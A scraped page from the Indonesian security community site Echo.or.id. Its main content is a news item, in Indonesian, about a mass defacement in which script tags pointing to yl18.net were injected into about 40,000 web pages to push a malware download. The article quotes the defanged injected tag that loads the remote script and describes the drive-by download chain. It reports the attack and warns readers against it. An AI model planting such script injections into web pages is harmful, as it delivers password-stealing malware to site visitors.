Home · Echo.or.id · Ezine · FAQ · Discussion Forum · Photo Gallery · Contact Us · Advisories · Event · Mailing List Friday, November 22, 2019
Navigation
Home
Todays Events
Contact Us
Search
News Categories
Advisories
Hardware
Journal
Network
Echo News
Security
Software
Public Poll
Why did you wanna be a hacker?

they`re wearing a hat

its on my blood, dude

my mom told me too

knowledge its delicious

they type faster

no idea, who am i ?

Friendly Links
+ Aikmel.or.id
+ id-ubuntu
+ udaramaya.com
+ kecoak-elektronik
+ newhack.org
+ Opensource.id
+ Jasakom.com
+ Konsultan Linux
+ w[X]f project
+ klik-kanan.com
+ hyem.org
+ ilmuwebsite.com
+ y3dips blogs

Security Links
+ Phrack Magazine
+ The hacker`s choice
+ TESO team archive
+ Phenoelit
+ WarAxe
+ milw0rm
+ Insecure
+ Planet Web Security
+ Metasploit framework
+ Uninformed journal
+ Security tools
+ PacketStorm Security
+ Hack in the Box
+ DefCon
Users Online
Guests Online: 2
No Members Online

Registered Members: 7
Newest Member: K-159
Echo Badges
Echo.or.id

Echo.or.id
IRC Channel
Join our IRC channel at irc.dal.net/e-c-h-o
Aksi Deface massal oleh yl18.net
SecurityDilaporkan oleh SANS dua hari yang lalu (tanggal 6 november), bahwa ratusan domain (hampir 40 ribu halaman) di internet di yakini telah di ambil alih oleh pembuat situs yl18.net. Cara deface massal tersebut adalah dengan melakukan injeksi "script tag" yang secara massal ke 40 ribu halaman web dari berbagai domain. "Script tag" atau barisan perintah ini adalah salah satu kode XSS (Cross site scripting) yang berisikan link ke file javascript di sebuah situs yang beralamat di hXXp://yl18.net

Potongan kode XSS tersebut adalah script src="hXXp://yl 18.net/0.js", yang akan men"generate" sebuah halaman yang berisi kode yang akan mendownload sebuah file executable windows file bernama Install.exe yang apabila anda coba buka dengan aplikasi dissasembler atau sekedar melihat strings di dalam file tersebut, maka akan banyak "perintah" berbahaya didalamnya, termasuk mendownload berbagai file lain.

berikut ini step by step gambar dari situs tersebut (yang sampai tulisan ini dibuat masih bisa diakses; jangan di akses apabila anda tidak yakin, karena kemungkinan akan berbahaya!)



Dan akan terciptalah sebuah dokumen baru yang memiliki URL lengkap di hXXp://yl 18.net/EDImage.htm



Yang apabila anda lihat source codenya akan berisikan frame yang berisi url untuk mendownload sebuah file *.exe (NoScript akan dengan cuma-cuma melakukan blocking buat anda :))



Skrip ini di sebarkan dengan di injeksikan keberbagai fasilitas dari suatu situs, semisal buku tamu dan komentar, yang nantinya akan mengantarkan pengunjung untuk mendownload dan mengeksekusi file tersebut, yang setelah di review oleh pihak SANS berisikan palikasi pencuri password untuk game online, sampai kepada aplikasi yang akan mengeksploitasi celah pada komputer anda. Bahkan, saat penulis melakukan searching menggunakan strings "yl18.net" di google, maka terlihat beberapa situs yang telah disisipi Baris kode berbahaya tersebut



Masih menurut SANS, tindakan attacker yang telah berhasil mengambil alih satu buah server di CHINA dan menanamkan "malicious code " itu kesebuah situs dengan domain yang bisa mudah di dapat adalah hal yang tidak sulit. Sedangkan upaya sesungguhnya adalah saat attacker menanamkan link ke ratusan situs (yang mengandung kode berbahaya) di internet.



Staff Login
Username

Password



Top 10 News
Hack In The Zoo - Online Class #1 65535
HITZ4 : "WIMAX, Are U Ready?" 65535
OPENBSD dibackdoor FBI sejak tahun 2000 65535
idsecconf 2011 Palembang -- Call of paper 65535
ECHO Gathering - Hack In The Zoo 5 - Bandung 65535
[Poltek Telkom] Student Creativity Contest 2011 - Open Mind IT Security Seminar 65535
Press Release IDSECCONF2010 65535
SharePoint vulnerable terhadap POET Attacks, Microsoft Keluarkan Security Advisory 65535
[ECHO_ADV_113$2010] BSI Hotel Booking System Admin Login Bypass Vulnerability 65535
Selamat Hari Lahir ECHO yang ke-8 62018
Top 5 News Posters
y3dips 91
K-159 45
az001 20
echostaff 14
pushm0v 3
Event Calendar
November 2019
S M T W T F S
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Echo T-Shirt
t-shirt
Echo Misc



Google
newbie_hacker
Visit this group

Add


Quotes
"A good leader is a person who takes a little more than his share of the blame and a little less than his share of the credit." (John C. Maxwell)
Echo Book
y3dips
Copyleft !© echo.inc 2003-2012